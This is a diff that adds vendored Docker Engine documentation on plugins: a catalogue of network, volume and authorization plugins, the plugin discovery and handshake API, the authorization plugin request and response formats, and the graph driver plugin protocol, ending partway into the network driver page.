+
+You can extend the capabilities of the Docker Engine by loading third-party
+plugins. This page explains the types of plugins and provides links to several
+volume and network plugins for Docker.
+
+## Types of plugins
+
+Plugins extend Docker's functionality. They come in specific types.  For
+example, a [volume plugin](plugins_volume.md) might enable Docker
+volumes to persist across multiple Docker hosts and a
+[network plugin](plugins_network.md) might provide network plumbing.
+
+Currently Docker supports authorization, volume and network driver plugins. In the future it
+will support additional plugin types.
+
+## Installing a plugin
+
+Follow the instructions in the plugin's documentation.
+
+## Finding a plugin
+
+The sections below provide an inexhaustive overview of available plugins.
+
+<style>
+#DocumentationText  tr td:first-child { white-space: nowrap;}
+</style>
+
+### Network plugins
+
+Plugin                                                                              | Description
+----------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+[Contiv Networking](https://github.com/contiv/netplugin)                            | An open source network plugin to provide infrastructure and security policies for a multi-tenant micro services deployment, while providing an integration to physical network for non-container workload. Contiv Networking implements the remote driver and IPAM APIs available in Docker 1.9 onwards.
+[Kuryr Network Plugin](https://github.com/openstack/kuryr)                          | A network plugin is developed as part of the OpenStack Kuryr project and implements the Docker networking (libnetwork) remote driver API by utilizing Neutron, the OpenStack networking service. It includes an IPAM driver as well.
+[Weave Network Plugin](https://www.weave.works/docs/net/latest/introducing-weave/)    | A network plugin that creates a virtual network that connects your Docker containers - across multiple hosts or clouds and enables automatic discovery of applications. Weave networks are resilient, partition tolerant, secure and work in partially connected networks, and other adverse environments - all configured with delightful simplicity.
+
+### Volume plugins
+
+Plugin                                                                              | Description
+----------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+[Azure File Storage plugin](https://github.com/Azure/azurefile-dockervolumedriver)  | Lets you mount Microsoft [Azure File Storage](https://azure.microsoft.com/blog/azure-file-storage-now-generally-available/) shares to Docker containers as volumes using the SMB 3.0 protocol. [Learn more](https://azure.microsoft.com/blog/persistent-docker-volumes-with-azure-file-storage/).
+[Blockbridge plugin](https://github.com/blockbridge/blockbridge-docker-volume)      | A volume plugin that provides access to an extensible set of container-based persistent storage options. It supports single and multi-host Docker environments with features that include tenant isolation, automated provisioning, encryption, secure deletion, snapshots and QoS.
+[Contiv Volume Plugin](https://github.com/contiv/volplugin)                         | An open source volume plugin that provides multi-tenant, persistent, distributed storage with intent based consumption. It has support for Ceph and NFS.
+[Convoy plugin](https://github.com/rancher/convoy)                                  | A volume plugin for a variety of storage back-ends including device mapper and NFS. It's a simple standalone executable written in Go and provides the framework to support vendor-specific extensions such as snapshots, backups and restore.
+[DRBD plugin](https://www.drbd.org/en/supported-projects/docker)                    | A volume plugin that provides highly available storage replicated by [DRBD](https://www.drbd.org). Data written to the docker volume is replicated in a cluster of DRBD nodes.
+[Flocker plugin](https://clusterhq.com/docker-plugin/)                              | A volume plugin that provides multi-host portable volumes for Docker, enabling you to run databases and other stateful containers and move them around across a cluster of machines.
+[gce-docker plugin](https://github.com/mcuadros/gce-docker)                         | A volume plugin able to attach, format and mount Google Compute [persistent-disks](https://cloud.google.com/compute/docs/disks/persistent-disks).
+[GlusterFS plugin](https://github.com/calavera/docker-volume-glusterfs)             | A volume plugin that provides multi-host volumes management for Docker using GlusterFS.
+[Horcrux Volume Plugin](https://github.com/muthu-r/horcrux)                         | A volume plugin that allows on-demand, version controlled access to your data. Horcrux is an open-source plugin, written in Go, and supports SCP, [Minio](https://www.minio.io) and Amazon S3.
+[HPE 3Par Volume Plugin](https://github.com/hpe-storage/python-hpedockerplugin/)    | A volume plugin that supports HPE 3Par and StoreVirtual iSCSI storage arrays.
+[IPFS Volume Plugin](http://github.com/vdemeester/docker-volume-ipfs)               | An open source volume plugin that allows using an [ipfs](https://ipfs.io/) filesystem as a volume.
+[Keywhiz plugin](https://github.com/calavera/docker-volume-keywhiz)                 | A plugin that provides credentials and secret management using Keywhiz as a central repository.
+[Local Persist Plugin](https://github.com/CWSpear/local-persist)                    | A volume plugin that extends the default `local` driver's functionality by allowing you specify a mountpoint anywhere on the host, which enables the files to *always persist*, even if the volume is removed via `docker volume rm`.
+[NetApp Plugin](https://github.com/NetApp/netappdvp) (nDVP)                         | A volume plugin that provides direct integration with the Docker ecosystem for the NetApp storage portfolio. The nDVP package supports the provisioning and management of storage resources from the storage platform to Docker hosts, with a robust framework for adding additional platforms in the future.
+[Netshare plugin](https://github.com/ContainX/docker-volume-netshare)                 | A volume plugin that provides volume management for NFS 3/4, AWS EFS and CIFS file systems.
+[OpenStorage Plugin](https://github.com/libopenstorage/openstorage)                 | A cluster-aware volume plugin that provides volume management for file and block storage solutions.  It implements a vendor neutral specification for implementing extensions such as CoS, encryption, and snapshots. It has example drivers based on FUSE, NFS, NBD and EBS to name a few.
+[Portworx Volume Plugin](https://github.com/portworx/px-dev)                        | A volume plugin that turns any server into a scale-out converged compute/storage node, providing container granular storage and highly available volumes across any node, using a shared-nothing storage backend that works with any docker scheduler.
+[Quobyte Volume Plugin](https://github.com/quobyte/docker-volume)                   | A volume plugin that connects Docker to [Quobyte](http://www.quobyte.com/containers)'s data center file system, a general-purpose scalable and fault-tolerant storage platform.
+[REX-Ray plugin](https://github.com/emccode/rexray)                                 | A volume plugin which is written in Go and provides advanced storage functionality for many platforms including VirtualBox, EC2, Google Compute Engine, OpenStack, and EMC.
+[Virtuozzo Storage and Ploop plugin](https://github.com/virtuozzo/docker-volume-ploop) | A volume plugin with support for Virtuozzo Storage distributed cloud file system as well as ploop devices.
+[VMware vSphere Storage Plugin](https://github.com/vmware/docker-volume-vsphere)    | Docker Volume Driver for vSphere enables customers to address persistent storage requirements for Docker containers in vSphere environments.
+
+### Authorization plugins
+
+ Plugin                                                       | Description
+------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ [Twistlock AuthZ Broker](https://github.com/twistlock/authz) | A basic extendable authorization plugin that runs directly on the host or inside a container. This plugin allows you to define user policies that it evaluates during authorization. Basic authorization is provided if Docker daemon is started with the --tlsverify flag (username is extracted from the certificate common name).
+
+## Troubleshooting a plugin
+
+If you are having problems with Docker after loading a plugin, ask the authors
+of the plugin for help. The Docker team may not be able to assist you.
+
+## Writing a plugin
+
+If you are interested in writing a plugin for Docker, or seeing how they work
+under the hood, see the [docker plugins reference](plugin_api.md).
diff --git a/vendor/github.com/docker/docker/docs/extend/plugin_api.md b/vendor/github.com/docker/docker/docs/extend/plugin_api.md
new file mode 100644
index 0000000000..693b77a2f3
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/extend/plugin_api.md
@@ -0,0 +1,196 @@
+---
+title: "Plugins API"
+description: "How to write Docker plugins extensions "
+keywords: "API, Usage, plugins, documentation, developer"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# Docker Plugin API
+
+Docker plugins are out-of-process extensions which add capabilities to the
+Docker Engine.
+
+This document describes the Docker Engine plugin API. To view information on
+plugins managed by Docker Engine, refer to [Docker Engine plugin system](index.md).
+
+This page is intended for people who want to develop their own Docker plugin.
+If you just want to learn about or use Docker plugins, look
+[here](legacy_plugins.md).
+
+## What plugins are
+
+A plugin is a process running on the same or a different host as the docker daemon,
+which registers itself by placing a file on the same docker host in one of the plugin
+directories described in [Plugin discovery](#plugin-discovery).
+
+Plugins have human-readable names, which are short, lowercase strings. For
+example, `flocker` or `weave`.
+
+Plugins can run inside or outside containers. Currently running them outside
+containers is recommended.
+
+## Plugin discovery
+
+Docker discovers plugins by looking for them in the plugin directory whenever a
+user or container tries to use one by name.
+
+There are three types of files which can be put in the plugin directory.
+
+* `.sock` files are UNIX domain sockets.
+* `.spec` files are text files containing a URL, such as `unix:///other.sock` or `tcp://localhost:8080`.
+* `.json` files are text files containing a full json specification for the plugin.
+
+Plugins with UNIX domain socket files must run on the same docker host, whereas
+plugins with spec or json files can run on a different host if a remote URL is specified.
+
+UNIX domain socket files must be located under `/run/docker/plugins`, whereas
+spec files can be located either under `/etc/docker/plugins` or `/usr/lib/docker/plugins`.
+
+The name of the file (excluding the extension) determines the plugin name.
+
+For example, the `flocker` plugin might create a UNIX socket at
+`/run/docker/plugins/flocker.sock`.
+
+You can define each plugin into a separated subdirectory if you want to isolate definitions from each other.
+For example, you can create the `flocker` socket under `/run/docker/plugins/flocker/flocker.sock` and only
+mount `/run/docker/plugins/flocker` inside the `flocker` container.
+
+Docker always searches for unix sockets in `/run/docker/plugins` first. It checks for spec or json files under
+`/etc/docker/plugins` and `/usr/lib/docker/plugins` if the socket doesn't exist. The directory scan stops as
+soon as it finds the first plugin definition with the given name.
+
+### JSON specification
+
+This is the JSON format for a plugin:
+
+```json
+{
+  "Name": "plugin-example",
+  "Addr": "https://example.com/docker/plugin",
+  "TLSConfig": {
+    "InsecureSkipVerify": false,
+    "CAFile": "/usr/shared/docker/certs/example-ca.pem",
+    "CertFile": "/usr/shared/docker/certs/example-cert.pem",
+    "KeyFile": "/usr/shared/docker/certs/example-key.pem"
+  }
+}
+```
+
+The `TLSConfig` field is optional and TLS will only be verified if this configuration is present.
+
+## Plugin lifecycle
+
+Plugins should be started before Docker, and stopped after Docker.  For
+example, when packaging a plugin for a platform which supports `systemd`, you
+might use [`systemd` dependencies](
+http://www.freedesktop.org/software/systemd/man/systemd.unit.html#Before=) to
+manage startup and shutdown order.
+
+When upgrading a plugin, you should first stop the Docker daemon, upgrade the
+plugin, then start Docker again.
+
+## Plugin activation
+
+When a plugin is first referred to -- either by a user referring to it by name
+(e.g.  `docker run --volume-driver=foo`) or a container already configured to
+use a plugin being started -- Docker looks for the named plugin in the plugin
+directory and activates it with a handshake. See Handshake API below.
+
+Plugins are *not* activated automatically at Docker daemon startup. Rather,
+they are activated only lazily, or on-demand, when they are needed.
+
+## Systemd socket activation
+
+Plugins may also be socket activated by `systemd`. The official [Plugins helpers](https://github.com/docker/go-plugins-helpers)
+natively supports socket activation. In order for a plugin to be socket activated it needs
+a `service` file and a `socket` file.
+
+The `service` file (for example `/lib/systemd/system/your-plugin.service`):
+
+```
+[Unit]
+Description=Your plugin
+Before=docker.service
+After=network.target your-plugin.socket
+Requires=your-plugin.socket docker.service
+
+[Service]
+ExecStart=/usr/lib/docker/your-plugin
+
+[Install]
+WantedBy=multi-user.target
+```
+The `socket` file (for example `/lib/systemd/system/your-plugin.socket`):
+
+```
+[Unit]
+Description=Your plugin
+
+[Socket]
+ListenStream=/run/docker/plugins/your-plugin.sock
+
+[Install]
+WantedBy=sockets.target
+```
+
+This will allow plugins to be actually started when the Docker daemon connects to
+the sockets they're listening on (for instance the first time the daemon uses them
+or if one of the plugin goes down accidentally).
+
+## API design
+
+The Plugin API is RPC-style JSON over HTTP, much like webhooks.
+
+Requests flow *from* the Docker daemon *to* the plugin.  So the plugin needs to
+implement an HTTP server and bind this to the UNIX socket mentioned in the
+"plugin discovery" section.
+
+All requests are HTTP `POST` requests.
+
+The API is versioned via an Accept header, which currently is always set to
+`application/vnd.docker.plugins.v1+json`.
+
+## Handshake API
+
+Plugins are activated via the following "handshake" API call.
+
+### /Plugin.Activate
+
+**Request:** empty body
+
+**Response:**
+```
+{
+    "Implements": ["VolumeDriver"]
+}
+```
+
+Responds with a list of Docker subsystems which this plugin implements.
+After activation, the plugin will then be sent events from this subsystem.
+
+Possible values are:
+
+* [`authz`](plugins_authorization.md)
+* [`NetworkDriver`](plugins_network.md)
+* [`VolumeDriver`](plugins_volume.md)
+
+
+## Plugin retries
+
+Attempts to call a method on a plugin are retried with an exponential backoff
+for up to 30 seconds. This may help when packaging plugins as containers, since
+it gives plugin containers a chance to start up before failing any user
+containers which depend on them.
+
+## Plugins helpers
+
+To ease plugins development, we're providing an `sdk` for each kind of plugins
+currently supported by Docker at [docker/go-plugins-helpers](https://github.com/docker/go-plugins-helpers).
diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md b/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md
new file mode 100644
index 0000000000..ac1837f754
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/extend/plugins_authorization.md
@@ -0,0 +1,260 @@
+---
+title: "Access authorization plugin"
+description: "How to create authorization plugins to manage access control to your Docker daemon."
+keywords: "security, authorization, authentication, docker, documentation, plugin, extend"
+redirect_from:
+- "/engine/extend/authorization/"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# Create an authorization plugin
+
+This document describes the Docker Engine plugins generally available in Docker
+Engine. To view information on plugins managed by Docker Engine,
+refer to [Docker Engine plugin system](index.md).
+
+Docker's out-of-the-box authorization model is all or nothing. Any user with
+permission to access the Docker daemon can run any Docker client command. The
+same is true for callers using Docker's Engine API to contact the daemon. If you
+require greater access control, you can create authorization plugins and add
+them to your Docker daemon configuration. Using an authorization plugin, a
+Docker administrator can configure granular access policies for managing access
+to Docker daemon.
+
+Anyone with the appropriate skills can develop an authorization plugin. These
+skills, at their most basic, are knowledge of Docker, understanding of REST, and
+sound programming knowledge. This document describes the architecture, state,
+and methods information available to an authorization plugin developer.
+
+## Basic principles
+
+Docker's [plugin infrastructure](plugin_api.md) enables
+extending Docker by loading, removing and communicating with
+third-party components using a generic API. The access authorization subsystem
+was built using this mechanism.
+
+Using this subsystem, you don't need to rebuild the Docker daemon to add an
+authorization plugin.  You can add a plugin to an installed Docker daemon. You do
+need to restart the Docker daemon to add a new plugin.
+
+An authorization plugin approves or denies requests to the Docker daemon based
+on both the current authentication context and the command context. The
+authentication context contains all user details and the authentication method.
+The command context contains all the relevant request data.
+
+Authorization plugins must follow the rules described in [Docker Plugin API](plugin_api.md).
+Each plugin must reside within directories described under the
+[Plugin discovery](plugin_api.md#plugin-discovery) section.
+
+**Note**: the abbreviations `AuthZ` and `AuthN` mean authorization and authentication
+respectively.
+
+## Default user authorization mechanism
+
+If TLS is enabled in the [Docker daemon](https://docs.docker.com/engine/security/https/), the default user authorization flow extracts the user details from the certificate subject name.
+That is, the `User` field is set to the client certificate subject common name, and the `AuthenticationMethod` field is set to `TLS`.
+
+## Basic architecture
+
+You are responsible for registering your plugin as part of the Docker daemon
+startup. You can install multiple plugins and chain them together. This chain
+can be ordered. Each request to the daemon passes in order through the chain.
+Only when all the plugins grant access to the resource, is the access granted.
+
+When an HTTP request is made to the Docker daemon through the CLI or via the
+Engine API, the authentication subsystem passes the request to the installed
+authentication plugin(s). The request contains the user (caller) and command
+context. The plugin is responsible for deciding whether to allow or deny the
+request.
+
+The sequence diagrams below depict an allow and deny authorization flow:
+
+![Authorization Allow flow](images/authz_allow.png)
+
+![Authorization Deny flow](images/authz_deny.png)
+
+Each request sent to the plugin includes the authenticated user, the HTTP
+headers, and the request/response body. Only the user name and the
+authentication method used are passed to the plugin. Most importantly, no user
+credentials or tokens are passed. Finally, not all request/response bodies
+are sent to the authorization plugin. Only those request/response bodies where
+the `Content-Type` is either `text/*` or `application/json` are sent.
+
+For commands that can potentially hijack the HTTP connection (`HTTP
+Upgrade`), such as `exec`, the authorization plugin is only called for the
+initial HTTP requests. Once the plugin approves the command, authorization is
+not applied to the rest of the flow. Specifically, the streaming data is not
+passed to the authorization plugins. For commands that return chunked HTTP
+response, such as `logs` and `events`, only the HTTP request is sent to the
+authorization plugins.
+
+During request/response processing, some authorization flows might
+need to do additional queries to the Docker daemon. To complete such flows,
+plugins can call the daemon API similar to a regular user. To enable these
+additional queries, the plugin must provide the means for an administrator to
+configure proper authentication and security policies.
+
+## Docker client flows
+
+To enable and configure the authorization plugin, the plugin developer must
+support the Docker client interactions detailed in this section.
+
+### Setting up Docker daemon
+
+Enable the authorization plugin with a dedicated command line flag in the
+`--authorization-plugin=PLUGIN_ID` format. The flag supplies a `PLUGIN_ID`
+value. This value can be the plugin’s socket or a path to a specification file.
+Authorization plugins can be loaded without restarting the daemon. Refer
+to the [`dockerd` documentation](../reference/commandline/dockerd.md#configuration-reloading) for more information.
+
+```bash
+$ dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,...
+```
+
+Docker's authorization subsystem supports multiple `--authorization-plugin` parameters.
+
+### Calling authorized command (allow)
+
+```bash
+$ docker pull centos
+...
+f1b10cd84249: Pull complete
+...
+```
+
+### Calling unauthorized command (deny)
+
+```bash
+$ docker pull centos
+...
+docker: Error response from daemon: authorization denied by plugin PLUGIN_NAME: volumes are not allowed.
+```
+
+### Error from plugins
+
+```bash
+$ docker pull centos
+...
+docker: Error response from daemon: plugin PLUGIN_NAME failed with error: AuthZPlugin.AuthZReq: Cannot connect to the Docker daemon. Is the docker daemon running on this host?.
+```
+
+## API schema and implementation
+
+In addition to Docker's standard plugin registration method, each plugin
+should implement the following two methods:
+
+* `/AuthZPlugin.AuthZReq` This authorize request method is called before the Docker daemon processes the client request.
+
+* `/AuthZPlugin.AuthZRes` This authorize response method is called before the response is returned from Docker daemon to the client.
+
+#### /AuthZPlugin.AuthZReq
+
+**Request**:
+
+```json
+{
+    "User":              "The user identification",
+    "UserAuthNMethod":   "The authentication method used",
+    "RequestMethod":     "The HTTP method",
+    "RequestURI":        "The HTTP request URI",
+    "RequestBody":       "Byte array containing the raw HTTP request body",
+    "RequestHeader":     "Byte array containing the raw HTTP request header as a map[string][]string "
+}
+```
+
+**Response**:
+
+```json
+{
+    "Allow": "Determined whether the user is allowed or not",
+    "Msg":   "The authorization message",
+    "Err":   "The error message if things go wrong"
+}
+```
+#### /AuthZPlugin.AuthZRes
+
+**Request**:
+
+```json
+{
+    "User":              "The user identification",
+    "UserAuthNMethod":   "The authentication method used",
+    "RequestMethod":     "The HTTP method",
+    "RequestURI":        "The HTTP request URI",
+    "RequestBody":       "Byte array containing the raw HTTP request body",
+    "RequestHeader":     "Byte array containing the raw HTTP request header as a map[string][]string",
+    "ResponseBody":      "Byte array containing the raw HTTP response body",
+    "ResponseHeader":    "Byte array containing the raw HTTP response header as a map[string][]string",
+    "ResponseStatusCode":"Response status code"
+}
+```
+
+**Response**:
+
+```json
+{
+   "Allow":              "Determined whether the user is allowed or not",
+   "Msg":                "The authorization message",
+   "Err":                "The error message if things go wrong"
+}
+```
+
+### Request authorization
+
+Each plugin must support two request authorization messages formats, one from the daemon to the plugin and then from the plugin to the daemon. The tables below detail the content expected in each message.
+
+#### Daemon -> Plugin
+
+Name                   | Type              | Description
+-----------------------|-------------------|-------------------------------------------------------
+User                   | string            | The user identification
+Authentication method  | string            | The authentication method used
+Request method         | enum              | The HTTP method (GET/DELETE/POST)
+Request URI            | string            | The HTTP request URI including API version (e.g., v.1.17/containers/json)
+Request headers        | map[string]string | Request headers as key value pairs (without the authorization header)
+Request body           | []byte            | Raw request body
+
+
+#### Plugin -> Daemon
+
+Name    | Type   | Description
+--------|--------|----------------------------------------------------------------------------------
+Allow   | bool   | Boolean value indicating whether the request is allowed or denied
+Msg     | string | Authorization message (will be returned to the client in case the access is denied)
+Err     | string | Error message (will be returned to the client in case the plugin encounter an error. The string value supplied may appear in logs, so should not include confidential information)
+
+### Response authorization
+
+The plugin must support two authorization messages formats, one from the daemon to the plugin and then from the plugin to the daemon. The tables below detail the content expected in each message.
+
+#### Daemon -> Plugin
+
+
+Name                    | Type              | Description
+----------------------- |------------------ |----------------------------------------------------
+User                    | string            | The user identification
+Authentication method   | string            | The authentication method used
+Request method          | string            | The HTTP method (GET/DELETE/POST)
+Request URI             | string            | The HTTP request URI including API version (e.g., v.1.17/containers/json)
+Request headers         | map[string]string | Request headers as key value pairs (without the authorization header)
+Request body            | []byte            | Raw request body
+Response status code    | int               | Status code from the docker daemon
+Response headers        | map[string]string | Response headers as key value pairs
+Response body           | []byte            | Raw docker daemon response body
+
+
+#### Plugin -> Daemon
+
+Name    | Type   | Description
+--------|--------|----------------------------------------------------------------------------------
+Allow   | bool   | Boolean value indicating whether the response is allowed or denied
+Msg     | string | Authorization message (will be returned to the client in case the access is denied)
+Err     | string | Error message (will be returned to the client in case the plugin encounter an error. The string value supplied may appear in logs, so should not include confidential information)
diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md b/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md
new file mode 100644
index 0000000000..d91c383b5f
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md
@@ -0,0 +1,376 @@
+---
+title: "Graphdriver plugins"
+description: "How to manage image and container filesystems with external plugins"
+keywords: "Examples, Usage, storage, image, docker, data, graph, plugin, api"
+advisory: experimental
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+
+## Changelog
+
+### 1.13.0
+
+- Support v2 plugins
+
+# Docker graph driver plugins
+
+Docker graph driver plugins enable admins to use an external/out-of-process
+graph driver for use with Docker engine. This is an alternative to using the
+built-in storage drivers, such as aufs/overlay/devicemapper/btrfs.
+
+You need to install and enable the plugin and then restart the Docker daemon
+before using the plugin. See the following example for the correct ordering
+of steps.
+
+```
+$ docker plugin install cpuguy83/docker-overlay2-graphdriver-plugin # this command also enables the driver
+<output supressed>
+$ pkill dockerd
+$ dockerd --experimental -s cpuguy83/docker-overlay2-graphdriver-plugin
+```
+
+# Write a graph driver plugin
+
+See the [plugin documentation](/docs/extend/index.md) for detailed information
+on the underlying plugin protocol.
+
+
+## Graph Driver plugin protocol
+
+If a plugin registers itself as a `GraphDriver` when activated, then it is
+expected to provide the rootfs for containers as well as image layer storage.
+
+### /GraphDriver.Init
+
+**Request**:
+```json
+{
+  "Home": "/graph/home/path",
+  "Opts": [],
+  "UIDMaps": [],
+  "GIDMaps": []
+}
+```
+
+Initialize the graph driver plugin with a home directory and array of options.
+These are passed through from the user, but the plugin is not required to parse
+or honor them.
+
+The request also includes a list of UID and GID mappings, structed as follows:
+```json
+{
+  "ContainerID": 0,
+  "HostID": 0,
+  "Size": 0
+}
+```
+
+**Response**:
+```json
+{
+  "Err": ""
+}
+```
+
+Respond with a non-empty string error if an error occurred.
+
+
+### /GraphDriver.Create
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
+  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142",
+  "MountLabel": "",
+  "StorageOpt": {}
+}
+```
+
+Create a new, empty, read-only filesystem layer with the specified
+`ID`, `Parent` and `MountLabel`. If `Parent` is an empty string, there is no
+parent layer. `StorageOpt` is map of strings which indicate storage options.
+
+**Response**:
+```json
+{
+  "Err": ""
+}
+```
+
+Respond with a non-empty string error if an error occurred.
+
+### /GraphDriver.CreateReadWrite
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
+  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142",
+  "MountLabel": "",
+  "StorageOpt": {}
+}
+```
+
+Similar to `/GraphDriver.Create` but creates a read-write filesystem layer.
+
+### /GraphDriver.Remove
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
+}
+```
+
+Remove the filesystem layer with this given `ID`.
+
+**Response**:
+```json
+{
+  "Err": ""
+}
+```
+
+Respond with a non-empty string error if an error occurred.
+
+### /GraphDriver.Get
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
+  "MountLabel": ""
+}
+```
+
+Get the mountpoint for the layered filesystem referred to by the given `ID`.
+
+**Response**:
+```json
+{
+  "Dir": "/var/mygraph/46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
+  "Err": ""
+}
+```
+
+Respond with the absolute path to the mounted layered filesystem.
+Respond with a non-empty string error if an error occurred.
+
+### /GraphDriver.Put
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
+}
+```
+
+Release the system resources for the specified `ID`, such as unmounting the
+filesystem layer.
+
+**Response**:
+```json
+{
+  "Err": ""
+}
+```
+
+Respond with a non-empty string error if an error occurred.
+
+### /GraphDriver.Exists
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
+}
+```
+
+Determine if a filesystem layer with the specified `ID` exists.
+
+**Response**:
+```json
+{
+  "Exists": true
+}
+```
+
+Respond with a boolean for whether or not the filesystem layer with the specified
+`ID` exists.
+
+### /GraphDriver.Status
+
+**Request**:
+```json
+{}
+```
+
+Get low-level diagnostic information about the graph driver.
+
+**Response**:
+```json
+{
+  "Status": [[]]
+}
+```
+
+Respond with a 2-D array with key/value pairs for the underlying status
+information.
+
+
+### /GraphDriver.GetMetadata
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187"
+}
+```
+
+Get low-level diagnostic information about the layered filesystem with the
+with the specified `ID`
+
+**Response**:
+```json
+{
+  "Metadata": {},
+  "Err": ""
+}
+```
+
+Respond with a set of key/value pairs containing the low-level diagnostic
+information about the layered filesystem.
+Respond with a non-empty string error if an error occurred.
+
+### /GraphDriver.Cleanup
+
+**Request**:
+```json
+{}
+```
+
+Perform necessary tasks to release resources help by the plugin, such as
+unmounting all the layered file systems.
+
+**Response**:
+```json
+{
+  "Err": ""
+}
+```
+
+Respond with a non-empty string error if an error occurred.
+
+
+### /GraphDriver.Diff
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
+  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142"
+}
+```
+
+Get an archive of the changes between the filesystem layers specified by the `ID`
+and `Parent`. `Parent` may be an empty string, in which case there is no parent.
+
+**Response**:
+```
+{{ TAR STREAM }}
+```
+
+### /GraphDriver.Changes
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
+  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142"
+}
+```
+
+Get a list of changes between the filesystem layers specified by the `ID` and
+`Parent`. If `Parent` is an empty string, there is no parent.
+
+**Response**:
+```json
+{
+  "Changes": [{}],
+  "Err": ""
+}
+```
+
+Respond with a list of changes. The structure of a change is:
+```json
+  "Path": "/some/path",
+  "Kind": 0,
+```
+
+Where the `Path` is the filesystem path within the layered filesystem that is
+changed and `Kind` is an integer specifying the type of change that occurred:
+
+- 0 - Modified
+- 1 - Added
+- 2 - Deleted
+
+Respond with a non-empty string error if an error occurred.
+
+### /GraphDriver.ApplyDiff
+
+**Request**:
+```
+{{ TAR STREAM }}
+```
+
+Extract the changeset from the given diff into the layer with the specified `ID`
+and `Parent`
+
+**Query Parameters**:
+
+- id (required)- the `ID` of the new filesystem layer to extract the diff to
+- parent (required)- the `Parent` of the given `ID`
+
+**Response**:
+```json
+{
+  "Size": 512366,
+  "Err": ""
+}
+```
+
+Respond with the size of the new layer in bytes.
+Respond with a non-empty string error if an error occurred.
+
+### /GraphDriver.DiffSize
+
+**Request**:
+```json
+{
+  "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187",
+  "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142"
+}
+```
+
+Calculate the changes between the specified `ID`
+
+**Response**:
+```json
+{
+  "Size": 512366,
+  "Err": ""
+}
+```
+
+Respond with the size changes between the specified `ID` and `Parent`
+Respond with a non-empty string error if an error occurred.
diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_network.md b/vendor/github.com/docker/docker/docs/extend/plugins_network.md
new file mode 100644
index 0000000000..a974862fa6
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/extend/plugins_network.md
@@ -0,0 +1,77 @@
+---
+title: "Docker network driver plugins"
+description: "Network driver plugins."
+keywords: "Examples, Usage, plugins, docker, documentation, user guide"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# Engine network driver plugins
+
+This document describes Docker Engine network driver plugins generally
+available in Docker Engine. To view information on plugins
+managed by Docker Engine, refer to [Docker Engine plugin system](index.md).
+
+Docker Engine network plugins enable Engine deployments to be extended to
+support a wide range of networking technologies, such as VXLAN, IPVLAN, MACVLAN
+or something completely different. Network driver plugins are supported via the
+LibNetwork project. Each plugin is implemented as a  "remote driver" for
+LibNetwork, which shares plugin infrastructure with Engine. Effectively, network
+driver plugins are activated in the same way as other plugins, and use the same
+kind of protocol.
+
+## Network driver plugins and swarm mode
+
+Docker 1.12 adds support for cluster management and orchestration called
+[swarm mode](https://docs.docker.com/engine/swarm/). Docker Engine running in swarm mode currently
+only supports the built-in overlay driver for networking. Therefore existing
+networking plugins will not work in swarm mode.
+
